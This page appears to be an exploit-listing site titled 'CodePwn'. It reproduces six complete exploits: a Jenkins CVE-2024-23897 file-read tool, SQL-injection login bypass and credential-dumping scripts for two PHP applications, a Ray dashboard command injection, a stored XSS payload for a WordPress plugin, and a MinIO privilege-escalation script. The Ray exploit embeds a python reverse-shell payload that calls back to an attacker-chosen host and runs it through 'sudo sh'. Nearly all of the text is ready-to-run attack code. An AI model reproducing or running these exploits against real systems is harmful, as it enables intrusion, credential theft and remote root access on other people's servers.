Latest exploits :: CodePwn

<pre><code># Exploit Title: Jenkins 2.441 - Local File Inclusion # Date: 14/04/2024 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip # Version: 2.441 # Tested on: Debian 12 (Bookworm) # CVE: CVE-2024-23897 from argparse import ArgumentParser from requests import Session, post, exceptions from threading import Thread from uuid import uuid4 from time import sleep from re import findall class Exploit(Thread): def __init__(self, url: str, identifier: str): Thread.__init__(self) self.daemon = True self.url = url self.params = {"remoting": "false"} self.identifier = identifier self.stop_thread = False self.listen = False def run(self): while not self.stop_thread: if self.listen: self.listen_and_print() def stop(self): self.stop_thread = True def receive_next_message(self): self.listen = True def wait_for_message(self): while self.listen: sleep(0.5) def print_formatted_output(self, output: str): if "ERROR: No such file" in output: print("File not found.") elif "ERROR: Failed to parse" in output: print("Could not read file.") expression = "No such agent \"(.*)\" exists." results = findall(expression, output) print("\n".join(results)) def listen_and_print(self): session = Session() headers = {"Side": "download", "Session": self.identifier} try: response = session.post(self.url, params=self.params, headers=headers) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to target to setup the listener.") exit(1) self.print_formatted_output(response.text) self.listen = False def send_file_request(self, filepath: str): headers = {"Side": "upload", "Session": self.identifier} payload = get_payload(filepath) try: post(self.url, data=payload, params=self.params, headers=headers, timeout=4) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to the target to send the request.") exit(1) def read_file(self, filepath: str): self.receive_next_message() sleep(0.1) self.send_file_request(filepath) self.wait_for_message() def get_payload_message(operation_index: int, text: str) -> bytes: text_bytes = bytes(text, "utf-8") text_size = len(text_bytes) text_message = text_size.to_bytes(2) + text_bytes message_size = len(text_message) payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message return payload def get_payload(filepath: str) -> bytes: arg_operation = 0 start_operation = 3 command = get_payload_message(arg_operation, "connect-node") poisoned_argument = get_payload_message(arg_operation, f"@{filepath}") payload = command + poisoned_argument + start_operation.to_bytes(1) return payload def start_interactive_file_read(exploit: Exploit): print("Press Ctrl+C to exit") while True: filepath = input("File to download:\n> ") filepath = make_path_absolute(filepath) exploit.receive_next_message() try: exploit.read_file(filepath) except exceptions.ReadTimeout: print("Payload request timed out.") def make_path_absolute(filepath: str) -> str: if not filepath.startswith('/'): return f"/proc/self/cwd/{filepath}" return filepath def format_target_url(url: str) -> str: if url.endswith('/'): url = url[:-1] return f"{url}/cli" def get_arguments(): parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897") parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/") parser.add_argument("-p", "--path", help="The absolute path of the file to download") return parser.parse_args() def main(): args = get_arguments() url = format_target_url(args.url) filepath = args.path identifier = str(uuid4()) exploit = Exploit(url, identifier) exploit.start() if filepath: filepath = make_path_absolute(filepath) exploit.read_file(filepath) exploit.stop() return try: start_interactive_file_read(exploit) except KeyboardInterrupt: pass print("\nQuitting") exploit.stop() if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip # Version: V 1.2 # Tested on: Windows 11 + XAMPP 8.0.30 ## Exploit Description ## SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. ## Steps to reproduce ## 1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php 2- Enter the following payload from username-box : admin'or'1-- 3- Press Login button or press Enter . ## Proof Of Concept [1] ## POST /ofrs/admin/index.php HTTP/1.1 Host: localhost Content-Length: 46 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ofrs/admin/index.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29 Connection: close username=admin%27or%27--&inputpwd=&login=login ## Proof Of Concept [ Python Based Script ] [2] ## import os import requests from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import pyautogui banner = """ ░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗ ██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝ ██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░ ██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗ ╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝ ░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░ # Code By : Diyar Saadi """ print(banner) payload_requests = input("Enter the payload: ") url_requests = "http://localhost/ofrs/admin/index.php" data = { 'username': payload_requests, 'password': 'password', 'login': 'Login' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Custom-Header': 'Your-Custom-Value' } try: response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False) if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']: print("Requests version: Admin Panel Successfully Bypassed !") url_selenium = "http://localhost/ofrs/admin/index.php" chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe" chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("executable_path=" + chrome_driver_path) driver = webdriver.Chrome(options=chrome_options) driver.get(url_selenium) pyautogui.typewrite(payload_requests) pyautogui.press('tab') pyautogui.typewrite(payload_requests) pyautogui.press('enter') WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php")) screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png") driver.save_screenshot(screenshot_path) print(f"Selenium version: Screenshot saved as {screenshot_path}") driver.quit() else: print("Requests version: Login failed.") except Exception as e: print(f"An error occurred: {e}") </code></pre>

<pre><code># Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack. import requests from bs4 import BeautifulSoup import argparse def print_header(): print("\033[1m\nStock Management System v1.0\033[0m") print("\033[1mSQL Injection Exploit\033[0m") print("\033[96mby blu3ming\n\033[0m") def parse_response(target_url): try: target_response = requests.get(target_url) soup = BeautifulSoup(target_response.text, 'html.parser') textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text # Split the text using ',' as a delimiter users = textarea_text.split(',') for user in users: # Split username and password using ':' as a delimiter username, password = user.split(':') print("| {:<20} | {:<40} |".format(username, password)) except: print("No data could be retrieved. Try again.") def retrieve_data(base_url): target_path = '/sms/admin/?page=purchase_order/manage_po&id=' payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" #Dump users table target_url = base_url + target_path + payload print("+----------------------+------------------------------------------+") print("| {:<20} | {:<40} |".format("username", "password")) print("+----------------------+------------------------------------------+") parse_response(target_url) print("+----------------------+------------------------------------------+\n") if __name__ == "__main__": about = 'Unauthenticated SQL Injection Exploit - Stock Management System' parser = argparse.ArgumentParser(description=about) parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL') args = parser.parse_args() print_header() retrieve_data(args.base_url) </code></pre>

<pre><code># Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) # Description: # The Ray Project dashboard contains a CPU profiling page, and the format parameter is # not validated before being inserted into a system command executed in a shell, allowing # for arbitrary command execution. If the system is configured to allow passwordless sudo # (a setup some Ray configurations require) this will result in a root shell being returned # to the user. If not configured, a user level shell will be returned # Version: <= 2.6.3 # Date: 2024-4-10 # Exploit Author: Fire_Wolf # Tested on: Ubuntu 20.04.6 LTS # Vendor Homepage: https://www.ray.io/ # Software Link: https://github.com/ray-project/ray # CVE: CVE-2023-6019 # Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe # ========================================================================================== # !usr/bin/python3 # coding=utf-8 import base64 import argparse import requests import urllib3 proxies = {"http": "127.0.0.1:8080"} headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" } def check_url(target, port): target_url = target + ":" + port https = 0 if 'http' not in target: try: urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) test_url = 'http://' + target_url response = requests.get(url=test_url, headers=headers, verify=False, timeout=3) if response.status_code != 200: is_https = 0 return is_https except Exception as e: print("ERROR! The Exception is:" + format(e)) if https == 1: return "https://" + target_url else: return "http://" + target_url def exp(target,ip,lhost, lport): payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'' print("[*]Payload is: " + payload) b64_payload = base64.b64encode(payload.encode()) print("[*]Base64 encoding payload is: " + b64_payload.decode()) exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`' # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess) print(exp_url) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url=exp_url, headers=headers, verify=False) if response.status_code == 200: print("[-]ERROR: Exploit Failed,please check the payload.") else: print("[+]Exploit is finished,please check your machine!") if __name__ == '__main__': parser = argparse.ArgumentParser( description=''' ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄ ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃ ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄ ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄ ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ''', formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('-t', '--target', type=str, required=True, help='tart ip') parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port') parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip') parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port') args = parser.parse_args() # target = args.target ip = args.target # port = args.port # lhost = args.lhost # lport = args.lport targeturl = check_url(args.target, args.port) print(targeturl) print("[*] Checking in url: " + targeturl) exp(targeturl, ip, args.lhost, args.lport) </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.32 # Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". # PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns # Vulnerable Properties name: name, playlist_id # Payload: "><script>alert(document.cookie)</script> # Request: POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 178 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i _wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000 </code></pre>

<pre><code># Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation # Date: 2024-04-11 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z # Tested on: Windows 10 # CVE : CVE-2024-24747 # Required before execution: pip install minio,requests import argparse import datetime import traceback import urllib from xml.dom.minidom import parseString import requests import json import base64 from minio.credentials import Credentials from minio.signer import sign_v4_s3 class CVE_2024_24747: new_buckets = [] old_buckets = [] def __init__(self, host, port, console_port, accesskey, secretkey, verify=False): self.bucket_names = ['pocpublic', 'pocprivate'] self.new_accesskey = 'miniocvepoc' self.new_secretkey = 'MINIOcvePOC' self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'Content-Type': 'application/json', 'Accept': '*/*' } self.accesskey = accesskey self.secretkey = secretkey self.verify = verify if verify: self.url = "https://" + host + ":" + port self.console_url = "https://" + host + ":" + console_port else: self.url = "http://" + host + ":" + port self.console_url = "http://" + host + ":" + console_port self.credits = Credentials( access_key=self.new_accesskey, secret_key=self.new_secretkey ) self.login() try: self.create_buckets() self.create_accesskey() self.old_buckets = self.console_ls() self.console_exp() self.new_buckets = self.console_ls() except: traceback.print_stack() finally: self.delete_accesskey() self.delete_buckets() if len(self.new_buckets) > len(self.old_buckets): print("There is CVE-2024-24747 problem with the minio!") print("Before the exploit, the buckets are : " + str(self.old_buckets)) print("After the exploit, the buckets are : " + str(self.new_buckets)) else: print("There is no CVE-2024-24747 problem with the minio!") def login(self): url = self.url + "/api/v1/login" payload = json.dumps({ "accessKey": self.accesskey, "secretKey": self.secretkey }) self.session = requests.session() if self.verify: self.session.verify = False status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 204: status_code = 0 else: print('Login failed! Please check if the input accesskey and secretkey are correct!') exit(1) def create_buckets(self): url = self.url + "/api/v1/buckets" for name in self.bucket_names: payload = json.dumps({ "name": name, "versioning": False, "locking": False }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 200: status_code = 0 else: print("新建 (New)"+name+" bucket 失败 (fail)！") def delete_buckets(self): for name in self.bucket_names: url = self.url + "/api/v1/buckets/" + name status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: status_code = 0 else: print("删除 (delete)"+name+" bucket 失败 (fail)！") def create_accesskey(self): url = self.url + "/api/v1/service-account-credentials" payload = json.dumps({ "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}", "accessKey": self.new_accesskey, "secretKey": self.new_secretkey }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 201: # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！") # print(self.new_secretkey) status_code = 0 else: print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！") def delete_accesskey(self): url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8') status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: # print("删除" + self.new_accesskey + " accessKey成功！") status_code = 0 else: print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！") def headers_gen(self,url,sha256,method): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(url) headers = { 'X-Amz-Content-Sha256': sha256, 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method=method, url=urls, region='us-east-1', headers=headers, credentials=self.credits, content_sha256=sha256, date=datetimes, ) return headers def console_ls(self): url = self.console_url + "/" sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" headers = self.headers_gen(url,sha256,'GET') if self.verify: response = requests.get(url,headers=headers,verify=False) else: response = requests.get(url, headers=headers) DOMTree = parseString(response.text) collection = DOMTree.documentElement buckets = collection.getElementsByTagName("Bucket") bucket_names = [] for bucket in buckets: bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data) # print('当前可查看的bucket有:\n' + str(bucket_names)) return bucket_names def console_exp(self): url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95" headers = self.headers_gen(url, sha256, 'POST') hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336" content = bytes.fromhex(hex_string) if self.verify: response = requests.post(url,headers=headers,data=content,verify=False) else: response = requests.post(url,headers=headers,data=content) status_code = response.status_code if status_code == 204: # print("提升" + self.new_accesskey + " 权限成功！") status_code = 0 else: print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！") if __name__ == '__main__': logo = """ ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ | / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / | (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ """ print(logo) parser = argparse.ArgumentParser() parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000") parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090") parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.") args = parser.parse_args() CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https) </code></pre>